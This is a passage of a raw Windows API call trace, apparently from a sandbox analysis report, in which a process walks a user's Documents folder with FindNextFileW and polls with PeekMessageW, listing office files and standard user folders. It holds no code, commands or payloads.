dwReserved1=0x25c6e50, cFileName="8vMS.docx", cAlternateFileName="8VMS~1.DOC")) returned 1 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b4b470, ftCreationTime.dwHighDateTime=0x1d4ce38, ftLastAccessTime.dwLowDateTime=0x4276a270, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x4276a270, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0xd827, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="B1NB4QkFt.rtf", cAlternateFileName="B1NB4Q~1.RTF")) returned 1 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee327a60, ftCreationTime.dwHighDateTime=0x1d4c3a6, ftLastAccessTime.dwLowDateTime=0x70160dd0, ftLastAccessTime.dwHighDateTime=0x1d4b8b2, ftLastWriteTime.dwLowDateTime=0x70160dd0, ftLastWriteTime.dwHighDateTime=0x1d4b8b2, nFileSizeHigh=0x0, nFileSizeLow=0xfecf, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="D3BEewSKP- XS.xlsx", cAlternateFileName="D3BEEW~1.XLS")) returned 1 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.140] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.141] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77884b40, ftCreationTime.dwHighDateTime=0x1d4f5df, ftLastAccessTime.dwLowDateTime=0xd4658920, ftLastAccessTime.dwHighDateTime=0x1d47e04, ftLastWriteTime.dwLowDateTime=0xd4658920, ftLastWriteTime.dwHighDateTime=0x1d47e04, nFileSizeHigh=0x0, nFileSizeLow=0x18bb1, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="dKfh5A-JQm_Dx.docx", cAlternateFileName="DKFH5A~1.DOC")) returned 1 [0259.141] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f5500, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0x4d68c6d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x4d68c6d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x8e1e, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="EJnozy8q_wA_6u.odt", cAlternateFileName="EJNOZY~1.ODT")) returned 1 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25439ff0, ftCreationTime.dwHighDateTime=0x1d49ccb, ftLastAccessTime.dwLowDateTime=0xcce10f20, ftLastAccessTime.dwHighDateTime=0x1d4b5fa, ftLastWriteTime.dwLowDateTime=0xcce10f20, ftLastWriteTime.dwHighDateTime=0x1d4b5fa, nFileSizeHigh=0x0, nFileSizeLow=0x13626, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="G0mzKIgpl5aj2M-.pptx", cAlternateFileName="G0MZKI~1.PPT")) returned 1 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.142] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200939b0, ftCreationTime.dwHighDateTime=0x1d4a571, ftLastAccessTime.dwLowDateTime=0x6ef507e0, ftLastAccessTime.dwHighDateTime=0x1d4c720, ftLastWriteTime.dwLowDateTime=0x6ef507e0, ftLastWriteTime.dwHighDateTime=0x1d4c720, nFileSizeHigh=0x0, nFileSizeLow=0x9e84, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="goQ5n58_cIUllMnUx.xlsx", cAlternateFileName="GOQ5N5~1.XLS")) returned 1 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74dee10, ftCreationTime.dwHighDateTime=0x1d4e7bf, ftLastAccessTime.dwLowDateTime=0x93517fe0, ftLastAccessTime.dwHighDateTime=0x1d4d050, ftLastWriteTime.dwLowDateTime=0x93517fe0, ftLastWriteTime.dwHighDateTime=0x1d4d050, nFileSizeHigh=0x0, nFileSizeLow=0x67e9, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="icIcTV1 eT9I1Qro.xlsx", cAlternateFileName="ICICTV~1.XLS")) returned 1 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60886d20, ftCreationTime.dwHighDateTime=0x1d4e258, ftLastAccessTime.dwLowDateTime=0x9b4fc9f0, ftLastAccessTime.dwHighDateTime=0x1d4dc57, ftLastWriteTime.dwLowDateTime=0x9b4fc9f0, ftLastWriteTime.dwHighDateTime=0x1d4dc57, nFileSizeHigh=0x0, nFileSizeLow=0x182e1, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="IqPW.xlsx", cAlternateFileName="IQPW~1.XLS")) returned 1 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.143] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe951730, ftCreationTime.dwHighDateTime=0x1d4cca9, ftLastAccessTime.dwLowDateTime=0xc395e470, ftLastAccessTime.dwHighDateTime=0x1d4c718, ftLastWriteTime.dwLowDateTime=0xc395e470, ftLastWriteTime.dwHighDateTime=0x1d4c718, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="Kji1x-v4FT0kOOxbY6", cAlternateFileName="KJI1X-~1")) returned 1 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141dbd0, ftCreationTime.dwHighDateTime=0x1d4d2f9, ftLastAccessTime.dwLowDateTime=0x7942c00, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x7942c00, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x152ef, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="M4zK0AkB79QVLka.rtf", cAlternateFileName="M4ZK0A~1.RTF")) returned 1 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x617772d0, ftCreationTime.dwHighDateTime=0x1d48989, ftLastAccessTime.dwLowDateTime=0x5d92c9d0, ftLastAccessTime.dwHighDateTime=0x1d4d691, ftLastWriteTime.dwLowDateTime=0x5d92c9d0, ftLastWriteTime.dwHighDateTime=0x1d4d691, nFileSizeHigh=0x0, nFileSizeLow=0x142e4, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="MkMwkg_ip2 n-V.docx", cAlternateFileName="MKMWKG~1.DOC")) returned 1 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.144] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1df860, ftCreationTime.dwHighDateTime=0x1d4d233, ftLastAccessTime.dwLowDateTime=0xc26e6c10, ftLastAccessTime.dwHighDateTime=0x1d48f4c, ftLastWriteTime.dwLowDateTime=0xc26e6c10, ftLastWriteTime.dwHighDateTime=0x1d48f4c, nFileSizeHigh=0x0, nFileSizeLow=0xb424, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="MlLRhGX00a.pptx", cAlternateFileName="MLLRHG~1.PPT")) returned 1 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.145] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.146] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d8a540, ftCreationTime.dwHighDateTime=0x1d49d63, 